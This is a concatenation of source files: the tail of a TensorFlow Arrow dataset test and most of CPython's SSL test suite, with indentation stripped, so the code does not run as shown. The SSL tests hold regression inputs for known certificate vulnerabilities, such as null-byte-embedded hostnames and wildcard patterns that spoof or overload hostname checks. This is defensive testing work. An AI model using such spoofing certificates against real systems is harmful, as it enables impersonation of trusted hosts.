[[[False, False], [False, True], [True, False], [True, True]]],
(dtypes.bool,),
(tensorflow.TensorShape([None]),))
batch = self.make_record_batch(truth_data)
dataset = arrow_io.ArrowDataset(
batch,
(0,),
truth_data.output_types,
truth_data.output_shapes)
self.run_test_case(dataset, truth_data)
def test_incorrect_column_type(self):
"""Test that a column with incorrect dtype raises error"""
truth_data = TruthData(self.scalar_data, self.scalar_dtypes,
self.scalar_shapes)
batch = self.make_record_batch(truth_data)
dataset = arrow_io.ArrowDataset(
batch,
list(range(len(truth_data.output_types))),
tuple([dtypes.int32 for _ in truth_data.output_types]),
truth_data.output_shapes)
with self.assertRaisesRegexp(errors.OpError, 'Arrow type mismatch'):
self.run_test_case(dataset, truth_data)
def test_map_and_batch(self):
"""
Test that using map then batch produces correct output. This will create
a map_and_batch_dataset_op that calls GetNext after end_of_sequence=true
"""
truth_data = TruthData(
[list(range(10))],
(dtypes.int32,),
(tensorflow.TensorShape([]),))
batch = self.make_record_batch(truth_data)
dataset = arrow_io.ArrowDataset(
batch,
list(range(len(truth_data.output_types))),
truth_data.output_types,
truth_data.output_shapes)
dataset = dataset.map(lambda x: x).batch(4)
it = dataset.make_one_shot_iterator()
d = it.get_next()
expected = truth_data.data[0]
with self.test_session() as sess:
while True:
try:
result = sess.run(d)
self.assertTrue(expected, 'Dataset has more output than expected')
for x in result:
self.assertEqual(x, expected[0])
expected.pop(0)
except tensorflow.errors.OutOfRangeError:
break
if __name__ == "__main__":
test.main()
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib.request
import traceback
import asyncore
import weakref
import platform
import functools
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNING_CA = data_file("pycacert.pem")
REMOTE_HOST = "self-signed.pythontest.net"
REMOTE_ROOT_CERT = data_file("selfsigned_pythontestdotnet.pem")
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
WRONGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2019_5010(self):
p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(
p,
{
'issuer': (
(('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
'notAfter': 'Jun 14 18:00:58 2028 GMT',
'notBefore': 'Jun 18 18:00:58 2018 GMT',
'serialNumber': '02',
'subject': ((('countryName', 'UK'),),
(('commonName',
'codenomicon-vm-2.test.lal.cisco.com'),)),
'subjectAltName': (
('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
'version': 3
}
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if "LibreSSL" in s:
self.assertTrue(s.startswith("LibreSSL {:d}.{:d}".format(major, minor)),
(s, t))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with ssl.wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=CERTFILE, keyfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=WRONGCERT, keyfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
self.assertRaises(TypeError, ssl.SSLContext)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1,
ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_SSLv2) | ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_TLSv1 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
